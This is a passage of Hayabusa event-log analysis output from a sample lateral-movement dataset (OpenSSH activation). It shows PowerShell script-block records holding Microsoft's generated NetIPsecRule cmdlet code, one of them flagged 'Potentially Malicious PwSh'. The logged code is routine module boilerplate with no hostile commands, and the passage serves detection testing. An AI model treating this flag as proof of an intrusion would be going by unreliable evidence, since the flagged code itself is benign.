$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
$",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', 